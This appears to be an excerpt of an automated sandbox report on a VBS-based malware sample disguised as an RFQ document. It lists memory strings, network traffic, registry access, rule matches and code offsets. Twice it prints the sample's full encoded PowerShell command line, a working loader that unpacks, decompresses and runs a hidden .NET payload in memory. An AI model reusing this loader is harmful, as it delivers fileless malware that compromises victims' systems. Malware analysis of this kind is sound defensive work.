                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.000000000282E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/
                      Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                      Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
                      Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002A84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id
                      Source: InstallUtil.exe, 00000008.00000002.2085803769.0000000007B71000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2085803769.0000000008EF8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.0000000002761000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2071800372.00000000036E6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2085410253.00000000069F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.0000000002A84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                      Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016$=
                      Source: InstallUtil.exe, 00000008.00000002.2087150967.0000000009E71000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2085803769.0000000007B71000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2085803769.0000000008EF8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.0000000002ADC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.0000000002761000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2071800372.00000000036E6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2085410253.00000000069F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.0000000002A84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                      Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17$=
                      Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2t
                      Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                      Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                      Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privac
                      Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002761000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2071800372.00000000036E6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2085410253.00000000069F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                      Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                      Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownHTTPS traffic detected: 51.159.14.89:443 -> 192.168.2.4:49730 version: TLS 1.2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                      E-Banking Fraud

                      barindex
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe" -enc JABBAG4AbwB2AHAAdABzAHMAaQBqACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAFAAYgBzAHEAcAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEEAbgBvAHYAcAB0AHMAcwBpAGoAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABQAGIAcwBxAHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEYAeABnAGoAYQB0AGIAeQBjAGIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFEAeQB5AGkAdAB0AHcAZgBiAHYAIAApADsAJABSAGIAbQB3AGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAFoAawBuAGoAbwBrAHEAZQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABGAHgAZwBqAGEAdABiAHkAYwBiACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAG8AcAB5AFQAbwAoACAAJABSAGIAbQB3AGUAIAApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAGwAbwBzAGUAKAApADsAJABGAHgAZwBqAGEAdABiAHkAYwBiAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIAAkAFIAYgBtAHcAZQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAUQB5AHkAaQB0AHQAdwBmAGIAdgApADsAIAAkAEoAegBrAGwAcgBvAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABRAHkAeQBpAHQAdAB3AGYAYgB2ACkAOwAgACQAUQBtAHIAZwBjAGQAZQBqACAAPQAgACQASgB6AGsAbAByAG8AcwAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFEAbQByAGcAYwBkAGUAagAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQAUQBtAHIAZwBjAGQAZQBqAC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe" -enc JABBAG4AbwB2AHAAdABzAHMAaQBqACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAFAAYgBzAHEAcAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEEAbgBvAHYAcAB0AHMAcwBpAGoAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABQAGIAcwBxAHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEYAeABnAGoAYQB0AGIAeQBjAGIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFEAeQB5AGkAdAB0AHcAZgBiAHYAIAApADsAJABSAGIAbQB3AGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAFoAawBuAGoAbwBrAHEAZQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABGAHgAZwBqAGEAdABiAHkAYwBiACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAG8AcAB5AFQAbwAoACAAJABSAGIAbQB3AGUAIAApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAGwAbwBzAGUAKAApADsAJABGAHgAZwBqAGEAdABiAHkAYwBiAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIAAkAFIAYgBtAHcAZQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAUQB5AHkAaQB0AHQAdwBmAGIAdgApADsAIAAkAEoAegBrAGwAcgBvAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABRAHkAeQBpAHQAdAB3AGYAYgB2ACkAOwAgACQAUQBtAHIAZwBjAGQAZQBqACAAPQAgACQASgB6AGsAbAByAG8AcwAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFEAbQByAGcAYwBkAGUAagAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQAUQBtAHIAZwBjAGQAZQBqAC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==Jump to behavior

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShellJump to behavior

                      System Summary

                      barindex
                      Source: Process Memory Space: RFQ_43200046412000086500125.vbs.exe PID: 7728, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_074AA860 NtResumeThread,3_2_074AA860
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_074AA858 NtResumeThread,3_2_074AA858
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_0518C6443_2_0518C644
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_0518C0FC3_2_0518C0FC
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_0518B5AE3_2_0518B5AE
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_0518F6903_2_0518F690
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_0518BD9C3_2_0518BD9C
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_0518B8003_2_0518B800
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_074A26D83_2_074A26D8
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_074A35983_2_074A3598
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_074A26C83_2_074A26C8
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_074A35883_2_074A3588
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_074A5B873_2_074A5B87
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_074A5B983_2_074A5B98
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_098725903_2_09872590
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_0987257F3_2_0987257F
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_098744813_2_09874481
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_098744903_2_09874490
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_0993DE383_2_0993DE38
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_099419A33_2_099419A3
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_099400403_2_09940040
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_09946CB83_2_09946CB8
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_09946CC83_2_09946CC8
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_099400063_2_09940006
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_0994CC503_2_0994CC50
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_0994CC403_2_0994CC40
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_09945AD83_2_09945AD8
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_09945AE83_2_09945AE8
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_09A298883_2_09A29888
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_09A294023_2_09A29402
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_09A294103_2_09A29410
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_09A200113_2_09A20011
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_09A200403_2_09A20040
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_09A274493_2_09A27449
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_09A274503_2_09A27450
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_09A27EE03_2_09A27EE0
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_09A27EF03_2_09A27EF0
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_09B600063_2_09B60006
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_09B610473_2_09B61047
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_09D900403_2_09D90040
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeCode function: 3_2_09D900193_2_09D90019
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_009910588_2_00991058
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_009910488_2_00991048
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_04BB2B688_2_04BB2B68
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_04BB2B498_2_04BB2B49
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_04CE36A88_2_04CE36A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_04CE026F8_2_04CE026F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_04CE05A78_2_04CE05A7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_04CE13188_2_04CE1318
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_04CF54888_2_04CF5488
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_04CF0D508_2_04CF0D50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_04CF66108_2_04CF6610
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_04CF54788_2_04CF5478
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_04CF85D78_2_04CF85D7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_04CF85F88_2_04CF85F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_04CF66018_2_04CF6601
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_04D194D88_2_04D194D8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_04D19C4E8_2_04D19C4E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_04D148888_2_04D14888
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_04D194C88_2_04D194C8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_04D18D408_2_04D18D40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_04D18D308_2_04D18D30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_04D148798_2_04D14879
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_050A47188_2_050A4718
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_050AAC688_2_050AAC68
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_050A3AC08_2_050A3AC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_050A470B8_2_050A470B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_050AAC828_2_050AAC82
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_050D46788_2_050D4678
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_050D74888_2_050D7488
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_050D12708_2_050D1270
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_050D52E18_2_050D52E1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_050D7D988_2_050D7D98
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_050D3A608_2_050D3A60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_050D05708_2_050D0570
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_050D05808_2_050D0580
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_050DAF278_2_050DAF27
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_050DAF388_2_050DAF38
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_050D15628_2_050D1562
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_050D74788_2_050D7478
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_050D14BB8_2_050D14BB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_050D52E18_2_050D52E1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_050D13278_2_050D1327
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_050D13708_2_050D1370
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_050D12608_2_050D1260
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_050D7D128_2_050D7D12
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_050D7D888_2_050D7D88
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_050D3DA88_2_050D3DA8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_057918E88_2_057918E8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_057918E38_2_057918E3
                      Source: RFQ_43200046412000086500125.vbsInitial sample: Strings found which are bigger than 50
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.00000000052FE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs RFQ_43200046412000086500125.vbs
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2046638246.0000000009DB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ_43200046412000086500125.vbs
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.00000000070D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ_43200046412000086500125.vbs
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000000.1751552999.0000000000074000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs RFQ_43200046412000086500125.vbs
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.00000000052A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs RFQ_43200046412000086500125.vbs
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2042987541.0000000009650000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameFjpcdguigfd.dll" vs RFQ_43200046412000086500125.vbs
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2041952584.0000000008BB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCpdmznj.exe0 vs RFQ_43200046412000086500125.vbs
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2009662736.00000000032F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RFQ_43200046412000086500125.vbs
